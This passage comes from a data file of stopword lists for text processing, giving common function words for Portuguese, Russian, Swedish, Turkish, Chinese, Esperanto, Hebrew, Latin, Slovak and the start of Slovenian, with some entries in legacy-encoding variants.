"xiv",
"xv",
"z",
"za",
"zawsze",
"zaś",
"ze",
"zł",
"żaden",
"że",
"żeby",
],
"pt": [
"a",
"acerca",
"adeus",
"agora",
"ainda",
"algmas",
"algo",
"algumas",
"alguns",
"ali",
"além",
"ambos",
"ano",
"anos",
"antes",
"ao",
"aos",
"apenas",
"apoio",
"apontar",
"após",
"aquela",
"aquelas",
"aquele",
"aqueles",
"aqui",
"aquilo",
"as",
"assim",
"através",
"atrás",
"até",
"aí",
"baixo",
"bastante",
"bem",
"bom",
"breve",
"cada",
"caminho",
"catorze",
"cedo",
"cento",
"certamente",
"certeza",
"cima",
"cinco",
"coisa",
"com",
"como",
"comprido",
"conhecido",
"conselho",
"contra",
"corrente",
"custa",
"cá",
"da",
"daquela",
"daquele",
"dar",
"das",
"de",
"debaixo",
"demais",
"dentro",
"depois",
"desde",
"desligado",
"dessa",
"desse",
"desta",
"deste",
"deve",
"devem",
"deverá",
"dez",
"dezanove",
"dezasseis",
"dezassete",
"dezoito",
"dia",
"diante",
"direita",
"diz",
"dizem",
"dizer",
"do",
"dois",
"dos",
"doze",
"duas",
"dá",
"dão",
"dúvida",
"e",
"ela",
"elas",
"ele",
"eles",
"em",
"embora",
"enquanto",
"entre",
"então",
"era",
"essa",
"essas",
"esse",
"esses",
"esta",
"estado",
"estar",
"estará",
"estas",
"estava",
"este",
"estes",
"esteve",
"estive",
"estivemos",
"estiveram",
"estiveste",
"estivestes",
"estou",
"está",
"estás",
"estão",
"eu",
"exemplo",
"falta",
"fará",
"favor",
"faz",
"fazeis",
"fazem",
"fazemos",
"fazer",
"fazes",
"fazia",
"faço",
"fez",
"fim",
"final",
"foi",
"fomos",
"for",
"fora",
"foram",
"forma",
"foste",
"fostes",
"fui",
"geral",
"grande",
"grandes",
"grupo",
"hoje",
"horas",
"há",
"iniciar",
"inicio",
"ir",
"irá",
"isso",
"ista",
"iste",
"isto",
"já",
"lado",
"ligado",
"local",
"logo",
"longe",
"lugar",
"lá",
"maior",
"maioria",
"maiorias",
"mais",
"mal",
"mas",
"me",
"meio",
"menor",
"menos",
"meses",
"mesmo",
"meu",
"meus",
"mil",
"minha",
"minhas",
"momento",
"muito",
"muitos",
"máximo",
"mês",
"na",
"nada",
"naquela",
"naquele",
"nas",
"nem",
"nenhuma",
"nessa",
"nesse",
"nesta",
"neste",
"no",
"noite",
"nome",
"nos",
"nossa",
"nossas",
"nosso",
"nossos",
"nova",
"nove",
"novo",
"novos",
"num",
"numa",
"nunca",
"não",
"nível",
"nós",
"número",
"o",
"obra",
"obrigada",
"obrigado",
"oitava",
"oitavo",
"oito",
"onde",
"ontem",
"onze",
"os",
"ou",
"outra",
"outras",
"outro",
"outros",
"para",
"parece",
"parte",
"partir",
"pegar",
"pela",
"pelas",
"pelo",
"pelos",
"perto",
"pessoas",
"pode",
"podem",
"poder",
"poderá",
"podia",
"ponto",
"pontos",
"por",
"porque",
"porquê",
"posição",
"possivelmente",
"posso",
"possível",
"pouca",
"pouco",
"povo",
"primeira",
"primeiro",
"promeiro",
"próprio",
"próximo",
"puderam",
"pôde",
"põe",
"põem",
"qual",
"qualquer",
"quando",
"quanto",
"quarta",
"quarto",
"quatro",
"que",
"quem",
"quer",
"quero",
"questão",
"quieto",
"quinta",
"quinto",
"quinze",
"quê",
"relação",
"sabe",
"saber",
"se",
"segunda",
"segundo",
"sei",
"seis",
"sem",
"sempre",
"ser",
"seria",
"sete",
"seu",
"seus",
"sexta",
"sexto",
"sim",
"sistema",
"sob",
"sobre",
"sois",
"somente",
"somos",
"sou",
"sua",
"suas",
"são",
"sétima",
"sétimo",
"tal",
"talvez",
"também",
"tanto",
"tarde",
"te",
"tem",
"temos",
"tempo",
"tendes",
"tenho",
"tens",
"tentar",
"tentaram",
"tente",
"tentei",
"ter",
"terceira",
"terceiro",
"teu",
"teus",
"teve",
"tipo",
"tive",
"tivemos",
"tiveram",
"tiveste",
"tivestes",
"toda",
"todas",
"todo",
"todos",
"trabalhar",
"trabalho",
"treze",
"três",
"tu",
"tua",
"tuas",
"tudo",
"tão",
"têm",
"um",
"uma",
"umas",
"uns",
"usa",
"usar",
"vai",
"vais",
"valor",
"veja",
"vem",
"vens",
"ver",
"verdade",
"verdadeiro",
"vez",
"vezes",
"viagem",
"vindo",
"vinte",
"você",
"vocês",
"vos",
"vossa",
"vossas",
"vosso",
"vossos",
"vários",
"vão",
"vêm",
"vós",
"zero",
"à",
"às",
"área",
"é",
"és",
"último",
],
"ru": [
"а",
"алло",
"без",
"белый",
"близко",
"более",
"больше",
"большой",
"будем",
"будет",
"будете",
"будешь",
"будто",
"буду",
"будут",
"будь",
"бы",
"бывает",
"бывь",
"был",
"была",
"были",
"было",
"быть",
"в",
"важная",
"важное",
"важные",
"важный",
"вам",
"вами",
"вас",
"ваш",
"ваша",
"ваше",
"ваши",
"вверх",
"вдали",
"вдруг",
"ведь",
"везде",
"вернуться",
"весь",
"вечер",
"взгляд",
"взять",
"вид",
"видеть",
"вместе",
"вниз",
"внизу",
"во",
"вода",
"война",
"вокруг",
"вон",
"вообще",
"вопрос",
"восемнадцатый",
"восемнадцать",
"восемь",
"восьмой",
"вот",
"впрочем",
"времени",
"время",
"все",
"всегда",
"всего",
"всем",
"всеми",
"всему",
"всех",
"всею",
"всю",
"всюду",
"вся",
"всё",
"второй",
"вы",
"выйти",
"г",
"где",
"главный",
"глаз",
"говорил",
"говорит",
"говорить",
"год",
"года",
"году",
"голова",
"голос",
"город",
"да",
"давать",
"давно",
"даже",
"далекий",
"далеко",
"дальше",
"даром",
"дать",
"два",
"двадцатый",
"двадцать",
"две",
"двенадцатый",
"двенадцать",
"дверь",
"двух",
"девятнадцатый",
"девятнадцать",
"девятый",
"девять",
"действительно",
"дел",
"делать",
"дело",
"день",
"деньги",
"десятый",
"десять",
"для",
"до",
"довольно",
"долго",
"должно",
"должный",
"дом",
"дорога",
"друг",
"другая",
"другие",
"других",
"друго",
"другое",
"другой",
"думать",
"душа",
"е",
"его",
"ее",
"ей",
"ему",
"если",
"есть",
"еще",
"ещё",
"ею",
"её",
"ж",
"ждать",
"же",
"жена",
"женщина",
"жизнь",
"жить",
"за",
"занят",
"занята",
"занято",
"заняты",
"затем",
"зато",
"зачем",
"здесь",
"земля",
"знать",
"значит",
"значить",
"и",
"идти",
"из",
"или",
"им",
"именно",
"иметь",
"ими",
"имя",
"иногда",
"их",
"к",
"каждая",
"каждое",
"каждые",
"каждый",
"кажется",
"казаться",
"как",
"какая",
"какой",
"кем",
"книга",
"когда",
"кого",
"ком",
"комната",
"кому",
"конец",
"конечно",
"которая",
"которого",
"которой",
"которые",
"который",
"которых",
"кроме",
"кругом",
"кто",
"куда",
"лежать",
"лет",
"ли",
"лицо",
"лишь",
"лучше",
"любить",
"люди",
"м",
"маленький",
"мало",
"мать",
"машина",
"между",
"меля",
"менее",
"меньше",
"меня",
"место",
"миллионов",
"мимо",
"минута",
"мир",
"мира",
"мне",
"много",
"многочисленная",
"многочисленное",
"многочисленные",
"многочисленный",
"мной",
"мною",
"мог",
"могут",
"мож",
"может",
"можно",
"можхо",
"мои",
"мой",
"мор",
"москва",
"мочь",
"моя",
"моё",
"мы",
"на",
"наверху",
"над",
"надо",
"назад",
"наиболее",
"найти",
"наконец",
"нам",
"нами",
"народ",
"нас",
"начала",
"начать",
"наш",
"наша",
"наше",
"наши",
"не",
"него",
"недавно",
"недалеко",
"нее",
"ней",
"некоторый",
"нельзя",
"нем",
"немного",
"нему",
"непрерывно",
"нередко",
"несколько",
"нет",
"нею",
"неё",
"ни",
"нибудь",
"ниже",
"низко",
"никакой",
"никогда",
"никто",
"никуда",
"ними",
"них",
"ничего",
"ничто",
"но",
"новый",
"нога",
"ночь",
"ну",
"нужно",
"нужный",
"нх",
"о",
"об",
"оба",
"обычно",
"один",
"одиннадцатый",
"одиннадцать",
"однажды",
"однако",
"одного",
"одной",
"оказаться",
"окно",
"около",
"он",
"она",
"они",
"оно",
"опять",
"особенно",
"остаться",
"от",
"ответить",
"отец",
"отовсюду",
"отсюда",
"очень",
"первый",
"перед",
"писать",
"плечо",
"по",
"под",
"подумать",
"пожалуйста",
"позже",
"пойти",
"пока",
"пол",
"получить",
"помнить",
"понимать",
"понять",
"пор",
"пора",
"после",
"последний",
"посмотреть",
"посреди",
"потом",
"потому",
"почему",
"почти",
"правда",
"прекрасно",
"при",
"про",
"просто",
"против",
"процентов",
"пятнадцатый",
"пятнадцать",
"пятый",
"пять",
"работа",
"работать",
"раз",
"разве",
"рано",
"раньше",
"ребенок",
"решить",
"россия",
"рука",
"русский",
"ряд",
"рядом",
"с",
"сам",
"сама",
"сами",
"самим",
"самими",
"самих",
"само",
"самого",
"самой",
"самом",
"самому",
"саму",
"самый",
"свет",
"свое",
"своего",
"своей",
"свои",
"своих",
"свой",
"свою",
"сделать",
"сеаой",
"себе",
"себя",
"сегодня",
"седьмой",
"сейчас",
"семнадцатый",
"семнадцать",
"семь",
"сидеть",
"сила",
"сих",
"сказал",
"сказала",
"сказать",
"сколько",
"слишком",
"слово",
"случай",
"смотреть",
"сначала",
"снова",
"со",
"собой",
"собою",
"советский",
"совсем",
"спасибо",
"спросить",
"сразу",
"стал",
"старый",
"стать",
"стол",
"сторона",
"стоять",
"страна",
"суть",
"считать",
"т",
"та",
"так",
"такая",
"также",
"таки",
"такие",
"такое",
"такой",
"там",
"твой",
"твоя",
"твоё",
"те",
"тебе",
"тебя",
"тем",
"теми",
"теперь",
"тех",
"то",
"тобой",
"тобою",
"товарищ",
"тогда",
"того",
"тоже",
"только",
"том",
"тому",
"тот",
"тою",
"третий",
"три",
"тринадцатый",
"тринадцать",
"ту",
"туда",
"тут",
"ты",
"тысяч",
"у",
"увидеть",
"уж",
"уже",
"улица",
"уметь",
"утро",
"хороший",
"хорошо",
"хотеть",
"хоть",
"хотя",
"хочешь",
"час",
"часто",
"часть",
"чаще",
"чего",
"человек",
"чем",
"чему",
"через",
"четвертый",
"четыре",
"четырнадцатый",
"четырнадцать",
"что",
"чтоб",
"чтобы",
"чуть",
"шестнадцатый",
"шестнадцать",
"шестой",
"шесть",
"эта",
"эти",
"этим",
"этими",
"этих",
"это",
"этого",
"этой",
"этом",
"этому",
"этот",
"эту",
"я",
],
"sv": [
"aderton",
"adertonde",
"adjö",
"aldrig",
"alla",
"allas",
"allt",
"alltid",
"alltså",
"andra",
"andras",
"annan",
"annat",
"artonde",
"artonn",
"att",
"av",
"bakom",
"bara",
"behöva",
"behövas",
"behövde",
"behövt",
"beslut",
"beslutat",
"beslutit",
"bland",
"blev",
"bli",
"blir",
"blivit",
"bort",
"borta",
"bra",
"bäst",
"bättre",
"båda",
"bådas",
"dag",
"dagar",
"dagarna",
"dagen",
"de",
"del",
"delen",
"dem",
"den",
"denna",
"deras",
"dess",
"dessa",
"det",
"detta",
"dig",
"din",
"dina",
"dit",
"ditt",
"dock",
"du",
"där",
"därför",
"då",
"efter",
"eftersom",
"ej",
"elfte",
"eller",
"elva",
"en",
"enkel",
"enkelt",
"enkla",
"enligt",
"er",
"era",
"ert",
"ett",
"ettusen",
"fanns",
"fem",
"femte",
"femtio",
"femtionde",
"femton",
"femtonde",
"fick",
"fin",
"finnas",
"finns",
"fjorton",
"fjortonde",
"fjärde",
"fler",
"flera",
"flesta",
"fram",
"framför",
"från",
"fyra",
"fyrtio",
"fyrtionde",
"få",
"får",
"fått",
"följande",
"för",
"före",
"förlåt",
"förra",
"första",
"genast",
"genom",
"gick",
"gjorde",
"gjort",
"god",
"goda",
"godare",
"godast",
"gott",
"gälla",
"gäller",
"gällt",
"gärna",
"gå",
"går",
"gått",
"gör",
"göra",
"ha",
"hade",
"haft",
"han",
"hans",
"har",
"heller",
"hellre",
"helst",
"helt",
"henne",
"hennes",
"hit",
"hon",
"honom",
"hundra",
"hundraen",
"hundraett",
"hur",
"här",
"hög",
"höger",
"högre",
"högst",
"i",
"ibland",
"icke",
"idag",
"igen",
"igår",
"imorgon",
"in",
"inför",
"inga",
"ingen",
"ingenting",
"inget",
"innan",
"inne",
"inom",
"inte",
"inuti",
"ja",
"jag",
"ju",
"jämfört",
"kan",
"kanske",
"knappast",
"kom",
"komma",
"kommer",
"kommit",
"kr",
"kunde",
"kunna",
"kunnat",
"kvar",
"legat",
"ligga",
"ligger",
"lika",
"likställd",
"likställda",
"lilla",
"lite",
"liten",
"litet",
"länge",
"längre",
"längst",
"lätt",
"lättare",
"lättast",
"långsam",
"långsammare",
"långsammast",
"långsamt",
"långt",
"man",
"med",
"mellan",
"men",
"mer",
"mera",
"mest",
"mig",
"min",
"mina",
"mindre",
"minst",
"mitt",
"mittemot",
"mot",
"mycket",
"många",
"måste",
"möjlig",
"möjligen",
"möjligt",
"möjligtvis",
"ned",
"nederst",
"nedersta",
"nedre",
"nej",
"ner",
"ni",
"nio",
"nionde",
"nittio",
"nittionde",
"nitton",
"nittonde",
"nog",
"noll",
"nr",
"nu",
"nummer",
"när",
"nästa",
"någon",
"någonting",
"något",
"några",
"nödvändig",
"nödvändiga",
"nödvändigt",
"nödvändigtvis",
"och",
"också",
"ofta",
"oftast",
"olika",
"olikt",
"om",
"oss",
"på",
"rakt",
"redan",
"rätt",
"sade",
"sagt",
"samma",
"sedan",
"senare",
"senast",
"sent",
"sex",
"sextio",
"sextionde",
"sexton",
"sextonde",
"sig",
"sin",
"sina",
"sist",
"sista",
"siste",
"sitt",
"sitta",
"sju",
"sjunde",
"sjuttio",
"sjuttionde",
"sjutton",
"sjuttonde",
"själv",
"sjätte",
"ska",
"skall",
"skulle",
"slutligen",
"små",
"smått",
"snart",
"som",
"stor",
"stora",
"stort",
"större",
"störst",
"säga",
"säger",
"sämre",
"sämst",
"så",
"sådan",
"sådana",
"sådant",
"tack",
"tidig",
"tidigare",
"tidigast",
"tidigt",
"till",
"tills",
"tillsammans",
"tio",
"tionde",
"tjugo",
"tjugoen",
"tjugoett",
"tjugonde",
"tjugotre",
"tjugotvå",
"tjungo",
"tolfte",
"tolv",
"tre",
"tredje",
"trettio",
"trettionde",
"tretton",
"trettonde",
"två",
"tvåhundra",
"under",
"upp",
"ur",
"ursäkt",
"ut",
"utan",
"utanför",
"ute",
"vad",
"var",
"vara",
"varför",
"varifrån",
"varit",
"varje",
"varken",
"vars",
"varsågod",
"vart",
"vem",
"vems",
"verkligen",
"vi",
"vid",
"vidare",
"viktig",
"viktigare",
"viktigast",
"viktigt",
"vilka",
"vilkas",
"vilken",
"vilket",
"vill",
"vänster",
"vänstra",
"värre",
"vår",
"våra",
"vårt",
"än",
"ännu",
"är",
"även",
"åt",
"åtminstone",
"åtta",
"åttio",
"åttionde",
"åttonde",
"över",
"övermorgon",
"överst",
"övre",
],
"tr": [
"acaba",
"acep",
"adeta",
"altmýþ",
"altmış",
"altý",
"altı",
"ama",
"ancak",
"arada",
"artýk",
"aslında",
"aynen",
"ayrıca",
"az",
"bana",
"bari",
"bazen",
"bazý",
"bazı",
"baţka",
"belki",
"ben",
"benden",
"beni",
"benim",
"beri",
"beþ",
"beş",
"beţ",
"bile",
"bin",
"bir",
"biraz",
"biri",
"birkaç",
"birkez",
"birçok",
"birþey",
"birþeyi",
"birşey",
"birşeyi",
"birţey",
"biz",
"bizden",
"bize",
"bizi",
"bizim",
"bu",
"buna",
"bunda",
"bundan",
"bunlar",
"bunları",
"bunların",
"bunu",
"bunun",
"burada",
"böyle",
"böylece",
"bütün",
"da",
"daha",
"dahi",
"dahil",
"daima",
"dair",
"dayanarak",
"de",
"defa",
"deđil",
"değil",
"diye",
"diđer",
"diğer",
"doksan",
"dokuz",
"dolayı",
"dolayısıyla",
"dört",
"edecek",
"eden",
"ederek",
"edilecek",
"ediliyor",
"edilmesi",
"ediyor",
"elli",
"en",
"etmesi",
"etti",
"ettiği",
"ettiğini",
"eđer",
"eğer",
"fakat",
"gibi",
"göre",
"halbuki",
"halen",
"hangi",
"hani",
"hariç",
"hatta",
"hele",
"hem",
"henüz",
"hep",
"hepsi",
"her",
"herhangi",
"herkes",
"herkesin",
"hiç",
"hiçbir",
"iken",
"iki",
"ila",
"ile",
"ilgili",
"ilk",
"illa",
"ise",
"itibaren",
"itibariyle",
"iyi",
"iyice",
"için",
"işte",
"iţte",
"kadar",
"kanýmca",
"karşın",
"katrilyon",
"kendi",
"kendilerine",
"kendini",
"kendisi",
"kendisine",
"kendisini",
"kere",
"kez",
"keţke",
"ki",
"kim",
"kimden",
"kime",
"kimi",
"kimse",
"kýrk",
"kýsaca",
"kırk",
"lakin",
"madem",
"međer",
"milyar",
"milyon",
"mu",
"mü",
"mý",
"mı",
"nasýl",
"nasıl",
"ne",
"neden",
"nedenle",
"nerde",
"nere",
"nerede",
"nereye",
"nitekim",
"niye",
"niçin",
"o",
"olan",
"olarak",
"oldu",
"olduklarını",
"olduğu",
"olduğunu",
"olmadı",
"olmadığı",
"olmak",
"olması",
"olmayan",
"olmaz",
"olsa",
"olsun",
"olup",
"olur",
"olursa",
"oluyor",
"on",
"ona",
"ondan",
"onlar",
"onlardan",
"onlari",
"onlarýn",
"onları",
"onların",
"onu",
"onun",
"otuz",
"oysa",
"pek",
"rağmen",
"sadece",
"sanki",
"sekiz",
"seksen",
"sen",
"senden",
"seni",
"senin",
"siz",
"sizden",
"sizi",
"sizin",
"sonra",
"tarafından",
"trilyon",
"tüm",
"var",
"vardı",
"ve",
"veya",
"veyahut",
"ya",
"yahut",
"yani",
"yapacak",
"yapmak",
"yaptı",
"yaptıkları",
"yaptığı",
"yaptığını",
"yapılan",
"yapılması",
"yapıyor",
"yedi",
"yerine",
"yetmiþ",
"yetmiş",
"yetmiţ",
"yine",
"yirmi",
"yoksa",
"yüz",
"zaten",
"çok",
"çünkü",
"öyle",
"üzere",
"üç",
"þey",
"þeyden",
"þeyi",
"þeyler",
"þu",
"þuna",
"þunda",
"þundan",
"þunu",
"şey",
"şeyden",
"şeyi",
"şeyler",
"şu",
"şuna",
"şunda",
"şundan",
"şunları",
"şunu",
"şöyle",
"ţayet",
"ţimdi",
"ţu",
"ţöyle",
],
"zh": [
"、",
"。",
"〈",
"〉",
"《",
"》",
"一",
"一切",
"一则",
"一方面",
"一旦",
"一来",
"一样",
"一般",
"七",
"万一",
"三",
"上下",
"不仅",
"不但",
"不光",
"不单",
"不只",
"不如",
"不怕",
"不惟",
"不成",
"不拘",
"不比",
"不然",
"不特",
"不独",
"不管",
"不论",
"不过",
"不问",
"与",
"与其",
"与否",
"与此同时",
"且",
"两者",
"个",
"临",
"为",
"为了",
"为什么",
"为何",
"为着",
"乃",
"乃至",
"么",
"之",
"之一",
"之所以",
"之类",
"乌乎",
"乎",
"乘",
"九",
"也",
"也好",
"也罢",
"了",
"二",
"于",
"于是",
"于是乎",
"云云",
"五",
"人家",
"什么",
"什么样",
"从",
"从而",
"他",
"他人",
"他们",
"以",
"以便",
"以免",
"以及",
"以至",
"以至于",
"以致",
"们",
"任",
"任何",
"任凭",
"似的",
"但",
"但是",
"何",
"何况",
"何处",
"何时",
"作为",
"你",
"你们",
"使得",
"例如",
"依",
"依照",
"俺",
"俺们",
"倘",
"倘使",
"倘或",
"倘然",
"倘若",
"借",
"假使",
"假如",
"假若",
"像",
"八",
"六",
"兮",
"关于",
"其",
"其一",
"其中",
"其二",
"其他",
"其余",
"其它",
"其次",
"具体地说",
"具体说来",
"再者",
"再说",
"冒",
"冲",
"况且",
"几",
"几时",
"凭",
"凭借",
"则",
"别",
"别的",
"别说",
"到",
"前后",
"前者",
"加之",
"即",
"即令",
"即使",
"即便",
"即或",
"即若",
"又",
"及",
"及其",
"及至",
"反之",
"反过来",
"反过来说",
"另",
"另一方面",
"另外",
"只是",
"只有",
"只要",
"只限",
"叫",
"叮咚",
"可",
"可以",
"可是",
"可见",
"各",
"各个",
"各位",
"各种",
"各自",
"同",
"同时",
"向",
"向着",
"吓",
"吗",
"否则",
"吧",
"吧哒",
"吱",
"呀",
"呃",
"呕",
"呗",
"呜",
"呜呼",
"呢",
"呵",
"呸",
"呼哧",
"咋",
"和",
"咚",
"咦",
"咱",
"咱们",
"咳",
"哇",
"哈",
"哈哈",
"哉",
"哎",
"哎呀",
"哎哟",
"哗",
"哟",
"哦",
"哩",
"哪",
"哪个",
"哪些",
"哪儿",
"哪天",
"哪年",
"哪怕",
"哪样",
"哪边",
"哪里",
"哼",
"哼唷",
"唉",
"啊",
"啐",
"啥",
"啦",
"啪达",
"喂",
"喏",
"喔唷",
"嗡嗡",
"嗬",
"嗯",
"嗳",
"嘎",
"嘎登",
"嘘",
"嘛",
"嘻",
"嘿",
"四",
"因",
"因为",
"因此",
"因而",
"固然",
"在",
"在下",
"地",
"多",
"多少",
"她",
"她们",
"如",
"如上所述",
"如何",
"如其",
"如果",
"如此",
"如若",
"宁",
"宁可",
"宁愿",
"宁肯",
"它",
"它们",
"对",
"对于",
"将",
"尔后",
"尚且",
"就",
"就是",
"就是说",
"尽",
"尽管",
"岂但",
"己",
"并",
"并且",
"开外",
"开始",
"归",
"当",
"当着",
"彼",
"彼此",
"往",
"待",
"得",
"怎",
"怎么",
"怎么办",
"怎么样",
"怎样",
"总之",
"总的来看",
"总的来说",
"总的说来",
"总而言之",
"恰恰相反",
"您",
"慢说",
"我",
"我们",
"或",
"或是",
"或者",
"所",
"所以",
"打",
"把",
"抑或",
"拿",
"按",
"按照",
"换句话说",
"换言之",
"据",
"接着",
"故",
"故此",
"旁人",
"无宁",
"无论",
"既",
"既是",
"既然",
"时候",
"是",
"是的",
"替",
"有",
"有些",
"有关",
"有的",
"望",
"朝",
"朝着",
"本",
"本着",
"来",
"来着",
"极了",
"果然",
"果真",
"某",
"某个",
"某些",
"根据",
"正如",
"此",
"此外",
"此间",
"毋宁",
"每",
"每当",
"比",
"比如",
"比方",
"沿",
"沿着",
"漫说",
"焉",
"然则",
"然后",
"然而",
"照",
"照着",
"甚么",
"甚而",
"甚至",
"用",
"由",
"由于",
"由此可见",
"的",
"的话",
"相对而言",
"省得",
"着",
"着呢",
"矣",
"离",
"第",
"等",
"等等",
"管",
"紧接着",
"纵",
"纵令",
"纵使",
"纵然",
"经",
"经过",
"结果",
"给",
"继而",
"综上所述",
"罢了",
"者",
"而",
"而且",
"而况",
"而外",
"而已",
"而是",
"而言",
"能",
"腾",
"自",
"自个儿",
"自从",
"自各儿",
"自家",
"自己",
"自身",
"至",
"至于",
"若",
"若是",
"若非",
"莫若",
"虽",
"虽则",
"虽然",
"虽说",
"被",
"要",
"要不",
"要不是",
"要不然",
"要么",
"要是",
"让",
"论",
"设使",
"设若",
"该",
"诸位",
"谁",
"谁知",
"赶",
"起",
"起见",
"趁",
"趁着",
"越是",
"跟",
"较",
"较之",
"边",
"过",
"还是",
"还有",
"这",
"这个",
"这么",
"这么些",
"这么样",
"这么点儿",
"这些",
"这会儿",
"这儿",
"这就是说",
"这时",
"这样",
"这边",
"这里",
"进而",
"连",
"连同",
"通过",
"遵照",
"那",
"那个",
"那么",
"那么些",
"那么样",
"那些",
"那会儿",
"那儿",
"那时",
"那样",
"那边",
"那里",
"鄙人",
"鉴于",
"阿",
"除",
"除了",
"除此之外",
"除非",
"随",
"随着",
"零",
"非但",
"非徒",
"靠",
"顺",
"顺着",
"首先",
"︿",
"!",
"#",
"$",
"%",
"&",
"(",
")",
"*",
"+",
",",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
":",
";",
"<",
">",
"?",
"@",
"[",
"]",
"{",
"|",
"}",
"~",
"¥",
],
"eo": [
"adiaŭ",
"ajn",
"al",
"ankoraŭ",
"antaŭ",
"aŭ",
"bonan",
"bonvole",
"bonvolu",
"bv",
"ci",
"cia",
"cian",
"cin",
"d-ro",
"da",
"de",
"dek",
"deka",
"do",
"doktor'",
"doktoro",
"du",
"dua",
"dum",
"eble",
"ekz",
"ekzemple",
"en",
"estas",
"estis",
"estos",
"estu",
"estus",
"eĉ",
"f-no",
"feliĉan",
"for",
"fraŭlino",
"ha",
"havas",
"havis",
"havos",
"havu",
"havus",
"he",
"ho",
"hu",
"ili",
"ilia",
"ilian",
"ilin",
"inter",
"io",
"ion",
"iu",
"iujn",
"iun",
"ja",
"jam",
"je",
"jes",
"k",
"kaj",
"ke",
"kio",
"kion",
"kiu",
"kiujn",
"kiun",
"kvankam",
"kvar",
"kvara",
"kvazaŭ",
"kvin",
"kvina",
"la",
"li",
"lia",
"lian",
"lin",
"malantaŭ",
"male",
"malgraŭ",
"mem",
"mi",
"mia",
"mian",
"min",
"minus",
"naŭ",
"naŭa",
"ne",
"nek",
"nenio",
"nenion",
"neniu",
"neniun",
"nepre",
"ni",
"nia",
"nian",
"nin",
"nu",
"nun",
"nur",
"ok",
"oka",
"oni",
"onia",
"onian",
"onin",
"plej",
"pli",
"plu",
"plus",
"por",
"post",
"preter",
"s-no",
"s-ro",
"se",
"sed",
"sep",
"sepa",
"ses",
"sesa",
"si",
"sia",
"sian",
"sin",
"sinjor'",
"sinjorino",
"sinjoro",
"sub",
"super",
"supren",
"sur",
"tamen",
"tio",
"tion",
"tiu",
"tiujn",
"tiun",
"tra",
"tri",
"tria",
"tuj",
"tute",
"unu",
"unua",
"ve",
"verŝajne",
"vi",
"via",
"vian",
"vin",
"ĉi",
"ĉio",
"ĉion",
"ĉiu",
"ĉiujn",
"ĉiun",
"ĉu",
"ĝi",
"ĝia",
"ĝian",
"ĝin",
"ĝis",
"ĵus",
"ŝi",
"ŝia",
"ŝin",
],
"he": [
"אבל",
"או",
"אולי",
"אותה",
"אותו",
"אותי",
"אותך",
"אותם",
"אותן",
"אותנו",
"אז",
"אחר",
"אחרות",
"אחרי",
"אחריכן",
"אחרים",
"אחרת",
"אי",
"איזה",
"איך",
"אין",
"איפה",
"איתה",
"איתו",
"איתי",
"איתך",
"איתכם",
"איתכן",
"איתם",
"איתן",
"איתנו",
"אך",
"אל",
"אלה",
"אלו",
"אם",
"אנחנו",
"אני",
"אס",
"אף",
"אצל",
"אשר",
"את",
"אתה",
"אתכם",
"אתכן",
"אתם",
"אתן",
"באיזומידה",
"באמצע",
"באמצעות",
"בגלל",
"בין",
"בלי",
"במידה",
"במקוםשבו",
"ברם",
"בשביל",
"בשעהש",
"בתוך",
"גם",
"דרך",
"הוא",
"היא",
"היה",
"היכן",
"היתה",
"היתי",
"הם",
"הן",
"הנה",
"הסיבהשבגללה",
"הרי",
"ואילו",
"ואת",
"זאת",
"זה",
"זות",
"יהיה",
"יוכל",
"יוכלו",
"יותרמדי",
"יכול",
"יכולה",
"יכולות",
"יכולים",
"יכל",
"יכלה",
"יכלו",
"יש",
"כאן",
"כאשר",
"כולם",
"כולן",
"כזה",
"כי",
"כיצד",
"כך",
"ככה",
"כל",
"כלל",
"כמו",
"כן",
"כפי",
"כש",
"לא",
"לאו",
"לאיזותכלית",
"לאן",
"לבין",
"לה",
"להיות",
"להם",
"להן",
"לו",
"לי",
"לכם",
"לכן",
"למה",
"למטה",
"למעלה",
"למקוםשבו",
"למרות",
"לנו",
"לעבר",
"לעיכן",
"לפיכך",
"לפני",
"מאד",
"מאחורי",
"מאיזוסיבה",
"מאין",
"מאיפה",
"מבלי",
"מבעד",
"מדוע",
"מה",
"מהיכן",
"מול",
"מחוץ",
"מי",
"מכאן",
"מכיוון",
"מלבד",
"מן",
"מנין",
"מסוגל",
"מעט",
"מעטים",
"מעל",
"מצד",
"מקוםבו",
"מתחת",
"מתי",
"נגד",
"נגר",
"נו",
"עד",
"עז",
"על",
"עלי",
"עליה",
"עליהם",
"עליהן",
"עליו",
"עליך",
"עליכם",
"עלינו",
"עם",
"עצמה",
"עצמהם",
"עצמהן",
"עצמו",
"עצמי",
"עצמם",
"עצמן",
"עצמנו",
"פה",
"רק",
"שוב",
"של",
"שלה",
"שלהם",
"שלהן",
"שלו",
"שלי",
"שלך",
"שלכה",
"שלכם",
"שלכן",
"שלנו",
"שם",
"תהיה",
"תחת",
],
"la": [
"a",
"ab",
"ac",
"ad",
"at",
"atque",
"aut",
"autem",
"cum",
"de",
"dum",
"e",
"erant",
"erat",
"est",
"et",
"etiam",
"ex",
"haec",
"hic",
"hoc",
"in",
"ita",
"me",
"nec",
"neque",
"non",
"per",
"qua",
"quae",
"quam",
"qui",
"quibus",
"quidem",
"quo",
"quod",
"re",
"rebus",
"rem",
"res",
"sed",
"si",
"sic",
"sunt",
"tamen",
"tandem",
"te",
"ut",
"vel",
],
"sk": [
"a",
"aby",
"aj",
"ako",
"aký",
"ale",
"alebo",
"ani",
"avšak",
"ba",
"bez",
"buï",
"cez",
"do",
"ho",
"hoci",
"i",
"ich",
"im",
"ja",
"jeho",
"jej",
"jemu",
"ju",
"k",
"kam",
"kde",
"kedže",
"keï",
"kto",
"ktorý",
"ku",
"lebo",
"ma",
"mi",
"mne",
"mnou",
"mu",
"my",
"mòa",
"môj",
"na",
"nad",
"nami",
"neho",
"nej",
"nemu",
"nich",
"nielen",
"nim",
"no",
"nám",
"nás",
"náš",
"ním",
"o",
"od",
"on",
"ona",
"oni",
"ono",
"ony",
"po",
"pod",
"pre",
"pred",
"pri",
"s",
"sa",
"seba",
"sem",
"so",
"svoj",
"taký",
"tam",
"teba",
"tebe",
"tebou",
"tej",
"ten",
"ti",
"tie",
"to",
"toho",
"tomu",
"tou",
"tvoj",
"ty",
"tá",
"tým",
"v",
"vami",
"veï",
"vo",
"vy",
"vám",
"vás",
"váš",
"však",
"z",
"za",
"zo",
"a",
"èi",
"èo",
"èí",
"òom",
"òou",
"òu",
"že",
],
"sl": [
"a",
"ali",
"april",
"avgust",
"b",
"bi",
"bil",
"bila",
"bile",
"bili",
"bilo",
"biti",
"blizu",
"bo",
"bodo",
"bojo",
"bolj",
"bom",
"bomo",
"boste",
"bova",
"boš",
